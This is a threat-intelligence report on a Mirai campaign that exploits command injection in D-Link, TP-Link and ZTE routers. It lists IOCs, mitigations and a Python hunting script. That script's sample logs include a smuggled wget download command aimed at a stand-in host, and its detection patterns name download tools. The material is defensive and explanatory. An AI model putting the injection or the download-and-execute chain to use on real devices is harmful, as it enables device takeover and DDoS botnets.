
CVE-2025-29635: Mirai Campaign Targets D-Link Devices

Threat actors are actively exploiting CVE-2025-29635, a command injection vulnerability in end-of-life D-Link DIR-823X routers, to deploy a Mirai botnet variant. The campaign utilizes malicious HTTP POST requests to download and execute shell scripts that fetch the final Mirai payload, while also targeting vulnerabilities in TP-Link and ZTE devices.

Sens: Immediate · Conf: high · Analyzed: 2026-04-21

Authors: Akamai SIRT

Actors: Mirai botnet

Source: Akamai

IOCs · 3

Key Takeaways

  • Threat actors are actively exploiting CVE-2025-29635, a command injection flaw in discontinued D-Link DIR-823X routers.
  • The campaign deploys a Mirai botnet variant named 'tuxnokill' that contains a hardcoded anti-AI string 'AI.NEEDS.TO.DIE'.
  • The attackers are also targeting TP-Link Archer AX21 devices (CVE-2023-1389) and ZTE ZXV10 H108L routers.
  • Exploitation involves sending malicious POST requests to specific endpoints to download and execute shell scripts.

Affected Systems

  • D-Link DIR-823X series routers (firmware versions 240126 and 24082)
  • TP-Link Archer AX21 devices
  • ZTE ZXV10 H108L routers

Vulnerabilities (CVEs)

  • CVE-2025-29635
  • CVE-2023-1389

Attack Chain

The attack begins with a malicious HTTP POST request targeting vulnerable endpoints on D-Link, TP-Link, or ZTE routers. This request exploits a command injection flaw to execute a chain of commands using native tools like wget, curl, or tftp to download a shell script. The shell script then fetches, changes permissions for, and executes the 'tuxnokill' Mirai malware payload. Once running, the malware connects to its command and control server to receive further instructions, such as initiating DDoS attacks.

Detection Availability

  • YARA Rules: Yes
  • Sigma Rules: No
  • Snort/Suricata Rules: Yes
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Snort, YARA

The article provides a Snort rule to detect network traffic to the botnet infrastructure and a YARA rule to identify files containing Mirai-associated strings and hashes.

Detection Engineering Assessment

  • EDR Visibility: Low — The targeted devices are consumer-grade IoT routers which typically do not support the installation of EDR agents.
  • Network Visibility: High — The initial exploitation occurs via cleartext HTTP POST requests, and subsequent payload downloads utilize unencrypted protocols like HTTP, TFTP, and FTP.
  • Detection Difficulty: Moderate — While network signatures can easily catch the specific exploit paths and known IPs, the lack of internal logging on IoT devices makes endpoint-level detection difficult.

Required Log Sources

  • Web Proxy Logs
  • Firewall Logs
  • Network IDS/IPS

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
Look for inbound HTTP POST requests to /goform/set_prohibiting containing shell metacharacters or common download tools (wget, curl) in the request body. | Web Proxy Logs / WAF Logs | Initial Access | Low
Search for outbound network connections from IoT device subnets to unexpected external IP addresses over ports 80, 21, or 69 (TFTP). | Firewall Logs | Command and Control / Execution | Medium
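The following is an added example of how both hunting hypotheses above can be run over log exports; it is not code from the Akamai SIRT article. The tab-separated log formats, the 10.20.0.0/24 IoT VLAN, the allow-listed update host 198.51.100.10, and all sample log lines are constructed for the example; only the endpoint paths, the User-Agent, the ports, and the two IP addresses named in this report are taken from the page.

```python
"""Hunting helpers for the two hypotheses in the table above.

Added example, not code from the Akamai SIRT article. The tab-separated log
formats below are constructed for this example; adapt the two parse functions
to your own proxy/WAF and firewall export formats.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, unquote_plus

# Values taken from the report: targeted endpoints, exploit User-Agent,
# and the C2 / downloader addresses named under Immediate Mitigation.
TARGET_PATHS = {"/goform/set_prohibiting", "/manager_dev_ping_t"}
EXPLOIT_USER_AGENT = "Go-http-client/1.1"
KNOWN_BAD_IPS = {"64.89.161.130", "88.214.20.14"}
WATCH_PORTS = {80, 21, 69}  # HTTP, FTP control, TFTP (second hypothesis)

SHELL_META = re.compile(r"[;|&`]|\$\(")
DOWNLOAD_TOOLS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _decoded_values(body):
    """Split a form-encoded body into decoded values; fall back to the whole body."""
    pairs = parse_qsl(body, keep_blank_values=True)
    return [v for _, v in pairs] if pairs else [unquote_plus(body)]


def assess_request(method, path, body, user_agent):
    """Return the reasons a request matches the first hypothesis ([] if it does not)."""
    if method.upper() != "POST" or path not in TARGET_PATHS:
        return []
    reasons = []
    text = "\n".join(_decoded_values(body))
    if SHELL_META.search(text):
        reasons.append("shell metacharacters in POST body")
    if DOWNLOAD_TOOLS.search(text):
        reasons.append("download tool in POST body")
    if user_agent == EXPLOIT_USER_AGENT:
        reasons.append("exploit User-Agent")
    return reasons


def scan_proxy_logs(lines):
    """Constructed format: time, src_ip, method, path, user_agent, body (tab-separated)."""
    hits = []
    for line in lines:
        ts, src, method, path, ua, body = line.split("\t", 5)
        reasons = assess_request(method, path, body, ua)
        if reasons:
            hits.append({"time": ts, "src": src, "path": path, "reasons": reasons})
    return hits


def scan_firewall_logs(lines, iot_subnets, allowed_destinations=frozenset()):
    """Constructed format: time, src_ip, dst_ip, dst_port, action (tab-separated).

    Flags any flow to a known-bad address, and flows from the IoT subnets to an
    external address that is neither internal nor allow-listed on a watched port.
    """
    nets = [ipaddress.ip_network(n) for n in iot_subnets]
    hits = []
    for line in lines:
        ts, src, dst, port, _action = line.split("\t")
        src_ip, dst_ip, port = ipaddress.ip_address(src), ipaddress.ip_address(dst), int(port)
        if dst in KNOWN_BAD_IPS:
            hits.append((ts, src, dst, port, "known-bad"))
            continue
        if not any(src_ip in n for n in nets) or port not in WATCH_PORTS:
            continue
        if any(dst_ip in n for n in RFC1918) or dst in allowed_destinations:
            continue
        hits.append((ts, src, dst, port, "unexpected"))
    return hits


# Constructed sample telemetry (documentation IP ranges; only the two addresses
# from the report are real indicators).
SAMPLE_PROXY_LOGS = [
    "2026-04-21T10:15:02Z\t198.51.100.77\tPOST\t/goform/set_prohibiting\tGo-http-client/1.1\t"
    "param=1%3Bwget+http%3A%2F%2F203.0.113.5%2Fx.sh",
    "2026-04-21T10:20:11Z\t192.168.1.10\tPOST\t/goform/set_prohibiting\tMozilla/5.0\t"
    "prohibiting_enable=1&start_time=08:00&end_time=17:00",
    "2026-04-21T10:21:40Z\t192.168.1.10\tGET\t/index.html\tMozilla/5.0\t",
]
SAMPLE_FIREWALL_LOGS = [
    "2026-04-21T10:15:09Z\t10.20.0.17\t64.89.161.130\t80\tALLOW",
    "2026-04-21T10:16:00Z\t10.20.0.17\t203.0.113.50\t69\tALLOW",
    "2026-04-21T10:16:30Z\t10.20.0.21\t10.20.0.1\t80\tALLOW",
    "2026-04-21T10:17:00Z\t10.20.0.17\t198.51.100.10\t80\tALLOW",
    "2026-04-21T10:17:30Z\t10.20.0.21\t198.51.100.200\t443\tALLOW",
]

if __name__ == "__main__":
    for hit in scan_proxy_logs(SAMPLE_PROXY_LOGS):
        print("proxy:", hit)
    # 10.20.0.0/24 as the IoT VLAN and 198.51.100.10 as an allow-listed host are assumptions.
    for hit in scan_firewall_logs(SAMPLE_FIREWALL_LOGS, ["10.20.0.0/24"], {"198.51.100.10"}):
        print("firewall:", hit)
```

The request check is gated on the targeted paths first, so an administrator's legitimate POST to /goform/set_prohibiting with plain form values is not flagged; decoding the body through parse_qsl keeps the form separator `&` from being mistaken for a shell metacharacter. The firewall check reports any flow to the two addresses from the report regardless of source, and otherwise restricts itself to the IoT subnets and the three ports the hypothesis names, which is where the Medium false-positive risk lives; tune the allow-list to your firmware-update and NTP hosts before running it over a full day of logs.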

Control Gaps

  • Lack of EDR visibility on IoT and network edge devices
  • Continued use of unpatched or end-of-life hardware in production environments

Key Behavioral Indicators

  • HTTP POST requests to /goform/set_prohibiting
  • User-Agent 'Go-http-client/1.1' in exploit attempts
  • Presence of 'AI.NEEDS.TO.DIE' string in network streams or memory

False Positive Assessment

  • Low, as the specific URI paths, hardcoded payload strings, and known malicious IPs are highly indicative of this specific Mirai botnet campaign.

Recommendations

Immediate Mitigation

  • Block inbound access to router management interfaces from the public internet.
  • Block outbound traffic to the identified C2 (64.89.161.130) and downloader (88.214.20.14) IP addresses.

Infrastructure Hardening

  • Replace end-of-life D-Link DIR-823X routers with supported hardware.
  • Apply the latest firmware patches to TP-Link and ZTE devices.
  • Segment IoT and network devices into isolated VLANs with restricted outbound access.

User Protection

  • Ensure default credentials on all network devices are changed to strong, unique passwords.

Security Awareness

  • Educate IT and procurement staff on the risks of maintaining end-of-life hardware in the environment.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1105 - Ingress Tool Transfer
  • T1071.001 - Application Layer Protocol: Web Protocols

Additional IOCs

  • Urls:
    • hxxp://88[.]214[.]20[.]14/dlink.sh - URL used to download the initial shell script for D-Link devices.
    • hxxp://88[.]214[.]20[.]14/tplinkwan.sh - URL used to download the initial shell script for TP-Link devices.
    • hxxp://88[.]214[.]20[.]14/bins/tux.mips - URL used to download the Mirai MIPS payload.
    • /manager_dev_ping_t - Endpoint targeted for ZTE ZXV10 H108L router exploitation.
  • File Hashes:
    • be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b (SHA256) - Mirai malware payload variant hash.
    • d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7 (SHA256) - Mirai malware payload variant hash.
    • 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8 (SHA256) - Mirai malware payload variant hash.
    • 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8 (SHA256) - Mirai malware payload variant hash.
  • File Paths:
    • /tmp/dlink.sh - Path where the downloaded shell script is saved and executed.
    • /tmp/tux.mips - Path where the downloaded Mirai binary is saved and executed.
  • Command Lines:
    • Purpose: Download and execute the initial shell script payload to fetch the Mirai botnet binary. | Tools: wget, curl, tftp, ftpget, chmod, sh | Stage: Execution
  • Other:
    • AI.NEEDS.TO.DIE - Hardcoded string found within the Mirai malware payload.
    • segmentation fault (core dumped) - Hardcoded string printed to the console on execution, standard in Mirai payloads.